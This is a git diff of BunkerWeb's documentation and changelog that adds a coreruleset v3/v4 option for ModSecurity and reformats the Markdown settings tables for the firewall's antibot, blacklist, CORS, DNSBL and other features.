diff --git a/.prettierignore b/.prettierignore
index 5565c0f27..dfb55c594 100644
--- a/.prettierignore
+++ b/.prettierignore
@@ -2,7 +2,7 @@ docs/
 env/
 */env/
 *.min*
-src/common/core/modsecurity/
+src/common/core/modsecurity/files/
 src/deps/src/
 mkdocs.yml
 CHANGELOG.md
diff --git a/CHANGELOG.md b/CHANGELOG.md
index cdb9d0e01..d59834d3a 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,6 +15,7 @@
 - [FEATURE] Add new Metrics core plugin that will allow metrics collection and retrieval of internal metrics
 - [FEATURE] Add setting DATABASE_LOG_LEVEL to control SQLAlchemy loggers separately from the main one
 - [FEATURE] Add whitelist check for the default-server as well
+- [FEATURE] Add the possibility to choose between the coreruleset v3 and v4 that will be used by ModSecurity (default is v3)
 - [MISC] Add a better custom certificate cache handling
 - [MISC] Updated Linux base images in Dockerfiles
 - [MISC] Add recommended dialects to databases string
@@ -25,7 +26,8 @@
 - [DEPS] Updated lua-resty-core to v0.1.28
 - [DEPS] Updated zlib version to v1.3.1
 - [DEPS] Updated ModSecurity version to v3.0.12
-- [DEPS] Updated coreruleset version to v4.0.0
+- [DEPS] Updated coreruleset version to v3.3.5
+- [DEPS] Added coreruleset version v4.0.0
 - [DEPS] Updated lua-resty-mlcache version to v2.7.0
 ## v1.5.5 - 2024/01/12
diff --git a/docs/settings.md b/docs/settings.md
index c346266b8..4f7f4b08f 100644
--- a/docs/settings.md
+++ b/docs/settings.md
@@ -15,39 +15,40 @@ When settings are considered as "multiple", it means that you can have multiple
 STREAM support :warning:
-| Setting | Default | Context |Multiple| Description |
-|------------------------------|------------------------------------------------------------------------------------------------------------------------|---------|--------|--------------------------------------------------|
-|`IS_LOADING` |`no` |global |no |Internal use : set to yes when BW is loading. |
-|`NGINX_PREFIX` |`/etc/nginx/` |global |no |Where nginx will search for configurations. |
-|`HTTP_PORT` |`8080` |global |no |HTTP port number which bunkerweb binds to. |
-|`HTTPS_PORT` |`8443` |global |no |HTTPS port number which bunkerweb binds to. |
-|`MULTISITE` |`no` |global |no |Multi site activation. |
-|`SERVER_NAME` |`www.example.com` |multisite|no |List of the virtual hosts served by bunkerweb. |
-|`WORKER_PROCESSES` |`auto` |global |no |Number of worker processes. |
-|`WORKER_RLIMIT_NOFILE` |`2048` |global |no |Maximum number of open files for worker processes.|
-|`WORKER_CONNECTIONS` |`1024` |global |no |Maximum number of connections per worker. |
-|`LOG_FORMAT` |`$host $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"`|global |no |The format to use for access logs. |
-|`LOG_LEVEL` |`notice` |global |no |The level to use for error logs. |
-|`DNS_RESOLVERS` |`127.0.0.11` |global |no |DNS addresses of resolvers to use. |
-|`DATASTORE_MEMORY_SIZE` |`64m` |global |no |Size of the internal datastore. |
-|`CACHESTORE_MEMORY_SIZE` |`64m` |global |no |Size of the internal cachestore. |
-|`CACHESTORE_IPC_MEMORY_SIZE` |`16m` |global |no |Size of the internal cachestore (ipc). |
-|`CACHESTORE_MISS_MEMORY_SIZE` |`16m` |global |no |Size of the internal cachestore (miss). |
-|`CACHESTORE_LOCKS_MEMORY_SIZE`|`16m` |global |no |Size of the internal cachestore (locks). |
-|`USE_API` |`yes` |global |no |Activate the API to control BunkerWeb. |
-|`API_HTTP_PORT` |`5000` |global |no |Listen port number for the API. |
-|`API_LISTEN_IP` |`0.0.0.0` |global |no |Listen IP address for the API. |
-|`API_SERVER_NAME` |`bwapi` |global |no |Server name (virtual host) for the API. |
-|`API_WHITELIST_IP` |`127.0.0.0/8` |global |no |List of IP/network allowed to contact the API. |
-|`AUTOCONF_MODE` |`no` |global |no |Enable Autoconf Docker integration. |
-|`SWARM_MODE` |`no` |global |no |Enable Docker Swarm integration. |
-|`KUBERNETES_MODE` |`no` |global |no |Enable Kubernetes integration. |
-|`SERVER_TYPE` |`http` |multisite|no |Server type : http or stream. |
-|`LISTEN_STREAM` |`yes` |multisite|no |Enable listening for non-ssl (passthrough). |
-|`LISTEN_STREAM_PORT` |`1337` |multisite|no |Listening port for non-ssl (passthrough). |
-|`LISTEN_STREAM_PORT_SSL` |`4242` |multisite|no |Listening port for ssl (passthrough). |
-|`USE_UDP` |`no` |multisite|no |UDP listen instead of TCP (stream). |
-|`USE_IPV6` |`no` |global |no |Enable IPv6 connectivity. |
+| Setting | Default | Context | Multiple | Description |
+| ------------------------------ | ------------------------------------------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------ |
+| `IS_LOADING` | `no` | global | no | Internal use : set to yes when BW is loading. |
+| `NGINX_PREFIX` | `/etc/nginx/` | global | no | Where nginx will search for configurations. |
+| `HTTP_PORT` | `8080` | global | no | HTTP port number which bunkerweb binds to. |
+| `HTTPS_PORT` | `8443` | global | no | HTTPS port number which bunkerweb binds to. |
+| `MULTISITE` | `no` | global | no | Multi site activation. |
+| `SERVER_NAME` | `www.example.com` | multisite | no | List of the virtual hosts served by bunkerweb. |
+| `WORKER_PROCESSES` | `auto` | global | no | Number of worker processes. |
+| `WORKER_RLIMIT_NOFILE` | `2048` | global | no | Maximum number of open files for worker processes. |
+| `WORKER_CONNECTIONS` | `1024` | global | no | Maximum number of connections per worker. |
+| `LOG_FORMAT` | `$host $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"` | global | no | The format to use for access logs. |
+| `LOG_LEVEL` | `notice` | global | no | The level to use for error logs. |
+| `DNS_RESOLVERS` | `127.0.0.11` | global | no | DNS addresses of resolvers to use. |
+| `DATASTORE_MEMORY_SIZE` | `64m` | global | no | Size of the internal datastore. |
+| `CACHESTORE_MEMORY_SIZE` | `64m` | global | no | Size of the internal cachestore. |
+| `CACHESTORE_IPC_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (ipc). |
+| `CACHESTORE_MISS_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (miss). |
+| `CACHESTORE_LOCKS_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (locks). |
+| `USE_API` | `yes` | global | no | Activate the API to control BunkerWeb. |
+| `API_HTTP_PORT` | `5000` | global | no | Listen port number for the API. |
+| `API_LISTEN_IP` | `0.0.0.0` | global | no | Listen IP address for the API. |
+| `API_SERVER_NAME` | `bwapi` | global | no | Server name (virtual host) for the API. |
+| `API_WHITELIST_IP` | `127.0.0.0/8` | global | no | List of IP/network allowed to contact the API. |
+| `AUTOCONF_MODE` | `no` | global | no | Enable Autoconf Docker integration. |
+| `SWARM_MODE` | `no` | global | no | Enable Docker Swarm integration. |
+| `KUBERNETES_MODE` | `no` | global | no | Enable Kubernetes integration. |
+| `SERVER_TYPE` | `http` | multisite | no | Server type : http or stream. |
+| `LISTEN_STREAM` | `yes` | multisite | no | Enable listening for non-ssl (passthrough). |
+| `LISTEN_STREAM_PORT` | `1337` | multisite | no | Listening port for non-ssl (passthrough). |
+| `LISTEN_STREAM_PORT_SSL` | `4242` | multisite | no | Listening port for ssl (passthrough). |
+| `USE_UDP` | `no` | multisite | no | UDP listen instead of TCP (stream). |
+| `USE_IPV6` | `no` | global | no | Enable IPv6 connectivity. |
+| `IS_DRAFT` | `no` | multisite | no | Internal use : set to yes when the service is in draft mode. |
 ## Core settings
@@ -58,19 +59,19 @@ STREAM support :x:
 Bot detection by using a challenge.
-| Setting | Default | Context |Multiple| Description |
-|---------------------------|------------|---------|--------|------------------------------------------------------------------------------------------------------------------------------|
-|`USE_ANTIBOT` |`no` |multisite|no |Activate antibot feature. |
-|`ANTIBOT_URI` |`/challenge`|multisite|no |Unused URI that clients will be redirected to to solve the challenge. |
-|`ANTIBOT_RECAPTCHA_SCORE` |`0.7` |multisite|no |Minimum score required for reCAPTCHA challenge. |
-|`ANTIBOT_RECAPTCHA_SITEKEY`| |multisite|no |Sitekey for reCAPTCHA challenge. |
-|`ANTIBOT_RECAPTCHA_SECRET` | |multisite|no |Secret for reCAPTCHA challenge. |
-|`ANTIBOT_HCAPTCHA_SITEKEY` | |multisite|no |Sitekey for hCaptcha challenge. |
-|`ANTIBOT_HCAPTCHA_SECRET` | |multisite|no |Secret for hCaptcha challenge. |
-|`ANTIBOT_TURNSTILE_SITEKEY`| |multisite|no |Sitekey for Turnstile challenge. |
-|`ANTIBOT_TURNSTILE_SECRET` | |multisite|no |Secret for Turnstile challenge. |
-|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.|
-|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
+| Setting | Default | Context | Multiple | Description |
+| --------------------------- | ------------ | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------ |
+| `USE_ANTIBOT` | `no` | multisite | no | Activate antibot feature. |
+| `ANTIBOT_URI` | `/challenge` | multisite | no | Unused URI that clients will be redirected to to solve the challenge. |
+| `ANTIBOT_RECAPTCHA_SCORE` | `0.7` | multisite | no | Minimum score required for reCAPTCHA challenge. |
+| `ANTIBOT_RECAPTCHA_SITEKEY` | | multisite | no | Sitekey for reCAPTCHA challenge. |
+| `ANTIBOT_RECAPTCHA_SECRET` | | multisite | no | Secret for reCAPTCHA challenge. |
+| `ANTIBOT_HCAPTCHA_SITEKEY` | | multisite | no | Sitekey for hCaptcha challenge. |
+| `ANTIBOT_HCAPTCHA_SECRET` | | multisite | no | Secret for hCaptcha challenge. |
+| `ANTIBOT_TURNSTILE_SITEKEY` | | multisite | no | Sitekey for Turnstile challenge. |
+| `ANTIBOT_TURNSTILE_SECRET` | | multisite | no | Secret for Turnstile challenge. |
+| `ANTIBOT_TIME_RESOLVE` | `60` | multisite | no | Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated. |
+| `ANTIBOT_TIME_VALID` | `86400` | multisite | no | Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
 ### Auth basic
@@ -78,13 +79,13 @@ STREAM support :x:
 Enforce login before accessing a resource or the whole site using HTTP basic auth method.
-| Setting | Default | Context |Multiple| Description |
-|---------------------|-----------------|---------|--------|------------------------------------------------|
-|`USE_AUTH_BASIC` |`no` |multisite|no |Use HTTP basic auth |
-|`AUTH_BASIC_LOCATION`|`sitewide` |multisite|no |URL of the protected resource or sitewide value.|
-|`AUTH_BASIC_USER` |`changeme` |multisite|no |Username |
-|`AUTH_BASIC_PASSWORD`|`changeme` |multisite|no |Password |
-|`AUTH_BASIC_TEXT` |`Restricted area`|multisite|no |Text to display |
+| Setting | Default | Context | Multiple | Description |
+| --------------------- | ----------------- | --------- | -------- | ------------------------------------------------ |
+| `USE_AUTH_BASIC` | `no` | multisite | no | Use HTTP basic auth |
+| `AUTH_BASIC_LOCATION` | `sitewide` | multisite | no | URL of the protected resource or sitewide value. |
+| `AUTH_BASIC_USER` | `changeme` | multisite | no | Username |
+| `AUTH_BASIC_PASSWORD` | `changeme` | multisite | no | Password |
+| `AUTH_BASIC_TEXT` | `Restricted area` | multisite | no | Text to display |
 ### Bad behavior
@@ -92,13 +93,13 @@ STREAM support :white_check_mark:
 Ban IP generating too much 'bad' HTTP status code in a period of time.
-| Setting | Default | Context |Multiple| Description |
-|---------------------------|-----------------------------|---------|--------|--------------------------------------------------------------------------------------------|
-|`USE_BAD_BEHAVIOR` |`yes` |multisite|no |Activate Bad behavior feature. |
-|`BAD_BEHAVIOR_STATUS_CODES`|`400 401 403 404 405 429 444`|multisite|no |List of HTTP status codes considered as 'bad'. |
-|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.|
-|`BAD_BEHAVIOR_THRESHOLD` |`10` |multisite|no |Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. |
-|`BAD_BEHAVIOR_COUNT_TIME` |`60` |multisite|no |Period of time (in seconds) during which we count 'bad' HTTP status codes. |
+| Setting | Default | Context | Multiple | Description |
+| --------------------------- | ----------------------------- | --------- | -------- | -------------------------------------------------------------------------------------------- |
+| `USE_BAD_BEHAVIOR` | `yes` | multisite | no | Activate Bad behavior feature. |
+| `BAD_BEHAVIOR_STATUS_CODES` | `400 401 403 404 405 429 444` | multisite | no | List of HTTP status codes considered as 'bad'. |
+| `BAD_BEHAVIOR_BAN_TIME` | `86400` | multisite | no | The duration time (in seconds) of a ban when the corresponding IP has reached the threshold. |
+| `BAD_BEHAVIOR_THRESHOLD` | `10` | multisite | no | Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. |
+| `BAD_BEHAVIOR_COUNT_TIME` | `60` | multisite | no | Period of time (in seconds) during which we count 'bad' HTTP status codes. |
 ### Blacklist
@@ -106,30 +107,30 @@ STREAM support :warning:
 Deny access based on internal and external IP/network/rDNS/ASN blacklists.
-| Setting | Default | Context |Multiple| Description |
-|----------------------------------|------------------------------------------------------------------------------------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------|
-|`USE_BLACKLIST` |`yes` |multisite|no |Activate blacklist feature. |
-|`BLACKLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to block. |
-|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. |
-|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. |
-|`BLACKLIST_RDNS` |`.shodan.io .censys.io` |multisite|no |List of reverse DNS suffixes, separated with spaces, to block. |
-|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
-|`BLACKLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to block. |
-|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. |
-|`BLACKLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to block. |
-|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. |
-|`BLACKLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to block. |
-|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. |
-|`BLACKLIST_IGNORE_IP` | |multisite|no |List of IP/network, separated with spaces, to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.|
-|`BLACKLIST_IGNORE_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. |
-|`BLACKLIST_IGNORE_URI_URLS` | |global |no |List of URLs, separated with spaces, containing URI to ignore in the blacklist. |
+| Setting | Default | Context | Multiple | Description |
+| ---------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------------------------------------------ |
+| `USE_BLACKLIST` | `yes` | multisite | no | Activate blacklist feature. |
+| `BLACKLIST_IP` | | multisite | no | List of IP/network, separated with spaces, to block. |
+| `BLACKLIST_IP_URLS` | `https://www.dan.me.uk/torlist/?exit` | global | no | List of URLs, separated with spaces, containing bad IP/network to block. |
+| `BLACKLIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS blacklist checks on global IP addresses. |
+| `BLACKLIST_RDNS` | `.shodan.io .censys.io` | multisite | no | List of reverse DNS suffixes, separated with spaces, to block. |
+| `BLACKLIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
+| `BLACKLIST_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to block. |
+| `BLACKLIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to block. |
+| `BLACKLIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to block. |
+| `BLACKLIST_USER_AGENT_URLS` | `https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list` | global | no | List of URLs, separated with spaces, containing bad User-Agent to block. |
+| `BLACKLIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to block. |
+| `BLACKLIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to block. |
+| `BLACKLIST_IGNORE_IP` | | multisite | no | List of IP/network, separated with spaces, to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_IP_URLS` | | global | no | List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_RDNS` | | multisite | no | List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. |
+| `BLACKLIST_IGNORE_URI_URLS` | | global | no | List of URLs, separated with spaces, containing URI to ignore in the blacklist. |
 ### Brotli
@@ -137,12 +138,12 @@ STREAM support :x: Compress HTTP requests with the brotli algorithm. -| Setting | Default | Context |Multiple| Description | -|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------| -|`USE_BROTLI` |`no` |multisite|no |Use brotli | -|`BROTLI_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with brotli.| -|`BROTLI_MIN_LENGTH`|`1000` |multisite|no |Minimum length for brotli compression. | -|`BROTLI_COMP_LEVEL`|`6` |multisite|no |The compression level of the brotli algorithm. 
| +| Setting | Default | Context | Multiple | Description | +| ------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ------------------------------------------------------- | +| `USE_BROTLI` | `no` | multisite | no | Use brotli | +| `BROTLI_TYPES` | `application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml` | multisite | no | List of MIME types that will be compressed with brotli. | +| `BROTLI_MIN_LENGTH` | `1000` | multisite | no | Minimum length for brotli compression. | +| `BROTLI_COMP_LEVEL` | `6` | multisite | no | The compression level of the brotli algorithm. | ### BunkerNet 
@@ -150,10 +151,10 @@ STREAM support :white_check_mark:
 Share threat data with other BunkerWeb instances via BunkerNet.
-| Setting | Default | Context |Multiple| Description |
-|------------------|--------------------------|---------|--------|-----------------------------|
-|`USE_BUNKERNET` |`yes` |multisite|no |Activate BunkerNet feature. |
-|`BUNKERNET_SERVER`|`https://api.bunkerweb.io`|global |no |Address of the BunkerNet API.|
+| Setting | Default | Context | Multiple | Description |
+| ------------------ | -------------------------- | --------- | -------- | ----------------------------- |
+| `USE_BUNKERNET` | `yes` | multisite | no | Activate BunkerNet feature. |
+| `BUNKERNET_SERVER` | `https://api.bunkerweb.io` | global | no | Address of the BunkerNet API. |
 ### CORS
@@ -161,19 +162,19 @@ STREAM support :x:
 Cross-Origin Resource Sharing.
-| Setting | Default | Context |Multiple| Description |
-|------------------------------|------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------------------|
-|`USE_CORS` |`no` |multisite|no |Use CORS |
-|`CORS_ALLOW_ORIGIN` |`*` |multisite|no |Allowed origins to make CORS requests : PCRE regex or *. |
-|`CORS_EXPOSE_HEADERS` |`Content-Length,Content-Range` |multisite|no |Value of the Access-Control-Expose-Headers header. |
-|`CROSS_ORIGIN_OPENER_POLICY` | |multisite|no |Value for the Cross-Origin-Opener-Policy header. |
-|`CROSS_ORIGIN_EMBEDDER_POLICY`| |multisite|no |Value for the Cross-Origin-Embedder-Policy header. |
-|`CROSS_ORIGIN_RESOURCE_POLICY`| |multisite|no |Value for the Cross-Origin-Resource-Policy header. |
-|`CORS_MAX_AGE` |`86400` |multisite|no |Value of the Access-Control-Max-Age header. |
-|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. |
-|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. |
-|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. |
-|`CORS_DENY_REQUEST` |`yes` |multisite|no |Deny request and don't send it to backend if Origin is not allowed.|
+| Setting | Default | Context | Multiple | Description |
+| ------------------------------ | ------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------------- |
+| `USE_CORS` | `no` | multisite | no | Use CORS |
+| `CORS_ALLOW_ORIGIN` | `*` | multisite | no | Allowed origins to make CORS requests : PCRE regex or *. |
+| `CORS_EXPOSE_HEADERS` | `Content-Length,Content-Range` | multisite | no | Value of the Access-Control-Expose-Headers header. |
+| `CROSS_ORIGIN_OPENER_POLICY` | | multisite | no | Value for the Cross-Origin-Opener-Policy header. |
+| `CROSS_ORIGIN_EMBEDDER_POLICY` | | multisite | no | Value for the Cross-Origin-Embedder-Policy header. |
+| `CROSS_ORIGIN_RESOURCE_POLICY` | | multisite | no | Value for the Cross-Origin-Resource-Policy header. |
+| `CORS_MAX_AGE` | `86400` | multisite | no | Value of the Access-Control-Max-Age header. |
+| `CORS_ALLOW_CREDENTIALS` | `no` | multisite | no | Send the Access-Control-Allow-Credentials header. |
+| `CORS_ALLOW_METHODS` | `GET, POST, OPTIONS` | multisite | no | Value of the Access-Control-Allow-Methods header. |
+| `CORS_ALLOW_HEADERS` | `DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range` | multisite | no | Value of the Access-Control-Allow-Headers header. |
+| `CORS_DENY_REQUEST` | `yes` | multisite | no | Deny request and don't send it to backend if Origin is not allowed. |
 ### Client cache
@@ -181,12 +182,12 @@ STREAM support :x:
 Manage caching for clients.
-| Setting | Default | Context |Multiple| Description |
-|-------------------------|------------------------------------------------------------|---------|--------|--------------------------------------------------------------------|
-|`USE_CLIENT_CACHE` |`no` |multisite|no |Tell client to store locally static files. |
-|`CLIENT_CACHE_EXTENSIONS`|`jpg|jpeg|png|bmp|ico|svg|tif|css|js|otf|ttf|eot|woff|woff2`|global |no |List of file extensions, separated with pipes that should be cached.|
-|`CLIENT_CACHE_ETAG` |`yes` |multisite|no |Send the HTTP ETag header for static resources. |
-|`CLIENT_CACHE_CONTROL` |`public, max-age=15552000` |multisite|no |Value of the Cache-Control HTTP header. |
+| Setting | Default | Context | Multiple | Description |
+| ------------------------- | -------------------------- | --------- | -------- | ----------------------------------------------- |
+| `USE_CLIENT_CACHE` | `no` | multisite | no | Tell client to store locally static files. |
+| `CLIENT_CACHE_EXTENSIONS` | `jpg | jpeg | png | bmp | ico | svg | tif | css | js | otf | ttf | eot | woff | woff2` | global | no | List of file extensions, separated with pipes that should be cached. |
+| `CLIENT_CACHE_ETAG` | `yes` | multisite | no | Send the HTTP ETag header for static resources. |
+| `CLIENT_CACHE_CONTROL` | `public, max-age=15552000` | multisite | no | Value of the Cache-Control HTTP header. |
 ### Country
@@ -194,10 +195,10 @@ STREAM support :white_check_mark:
 Deny access based on the country of the client IP.
-| Setting |Default| Context |Multiple| Description |
-|-------------------|-------|---------|--------|--------------------------------------------------------------------------------------------------------------|
-|`BLACKLIST_COUNTRY`| |multisite|no |Deny access if the country of the client is in the list (ISO 3166-1 alpha-2 format separated with spaces). |
-|`WHITELIST_COUNTRY`| |multisite|no |Deny access if the country of the client is not in the list (ISO 3166-1 alpha-2 format separated with spaces).|
+| Setting | Default | Context | Multiple | Description |
+| ------------------- | ------- | --------- | -------- | -------------------------------------------------------------------------------------------------------------- |
+| `BLACKLIST_COUNTRY` | | multisite | no | Deny access if the country of the client is in the list (ISO 3166-1 alpha-2 format separated with spaces). |
+| `WHITELIST_COUNTRY` | | multisite | no | Deny access if the country of the client is not in the list (ISO 3166-1 alpha-2 format separated with spaces). |
 ### Custom HTTPS certificate
@@ -205,13 +206,13 @@ STREAM support :white_check_mark:
 Choose custom certificate for HTTPS.
-| Setting |Default| Context |Multiple| Description |
-|----------------------|-------|---------|--------|--------------------------------------------------------------------------------|
-|`USE_CUSTOM_SSL` |`no` |multisite|no |Use custom HTTPS certificate. |
-|`CUSTOM_SSL_CERT` | |multisite|no |Full path of the certificate or bundle file (must be readable by the scheduler).|
-|`CUSTOM_SSL_KEY` | |multisite|no |Full path of the key file (must be readable by the scheduler). |
-|`CUSTOM_SSL_CERT_DATA`| |multisite|no |Certificate data encoded in base64. |
-|`CUSTOM_SSL_KEY_DATA` | |multisite|no |Key data encoded in base64. |
+| Setting | Default | Context | Multiple | Description |
+| ---------------------- | ------- | --------- | -------- | -------------------------------------------------------------------------------- |
+| `USE_CUSTOM_SSL` | `no` | multisite | no | Use custom HTTPS certificate. |
+| `CUSTOM_SSL_CERT` | | multisite | no | Full path of the certificate or bundle file (must be readable by the scheduler). |
+| `CUSTOM_SSL_KEY` | | multisite | no | Full path of the key file (must be readable by the scheduler). |
+| `CUSTOM_SSL_CERT_DATA` | | multisite | no | Certificate data encoded in base64. |
+| `CUSTOM_SSL_KEY_DATA` | | multisite | no | Key data encoded in base64. |
 ### DB
@@ -219,9 +220,10 @@ STREAM support :white_check_mark:
 Integrate easily the Database.
-| Setting | Default |Context|Multiple| Description |
-|--------------|-----------------------------------------|-------|--------|--------------------------------------------------|
-|`DATABASE_URI`|`sqlite:////var/lib/bunkerweb/db.sqlite3`|global |no |The database URI, following the sqlalchemy format.|
+| Setting | Default | Context | Multiple | Description |
+| -------------------- | ----------------------------------------- | ------- | -------- | -------------------------------------------------- |
+| `DATABASE_URI` | `sqlite:////var/lib/bunkerweb/db.sqlite3` | global | no | The database URI, following the sqlalchemy format. |
+| `DATABASE_LOG_LEVEL` | `warning` | global | no | The level to use for database logs. |
 ### DNSBL
@@ -229,10 +231,10 @@ STREAM support :white_check_mark:
 Deny access based on external DNSBL servers.
-| Setting | Default | Context |Multiple| Description |
-|------------|----------------------------------------------------------------------------|---------|--------|-----------------------|
-|`USE_DNSBL` |`yes` |multisite|no |Activate DNSBL feature.|
-|`DNSBL_LIST`|`bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org`|global |no |List of DNSBL servers. |
+| Setting | Default | Context | Multiple | Description |
+| ------------ | ---------------------------------------------------------------------------- | --------- | -------- | ----------------------- |
+| `USE_DNSBL` | `yes` | multisite | no | Activate DNSBL feature. |
+| `DNSBL_LIST` | `bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org` | global | no | List of DNSBL servers. |
 ### Errors
@@ -240,10 +242,10 @@ STREAM support :x: Manage default error pages -| Setting | Default | Context |Multiple| Description | -|-------------------------|-------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------------------------------| -|`ERRORS` | |multisite|no |List of HTTP error code and corresponding error pages, separated with spaces (404=/my404.html 403=/errors/403.html ...).| -|`INTERCEPTED_ERROR_CODES`|`400 401 403 404 405 413 429 500 501 502 503 504`|multisite|no |List of HTTP error code intercepted by BunkerWeb | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------------------------------------------------- | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------ | +| `ERRORS` | | multisite | no | List of HTTP error code and corresponding error pages, separated with spaces (404=/my404.html 403=/errors/403.html ...). | +| `INTERCEPTED_ERROR_CODES` | `400 401 403 404 405 413 429 500 501 502 503 504` | multisite | no | List of HTTP error code intercepted by BunkerWeb | ### Greylist 
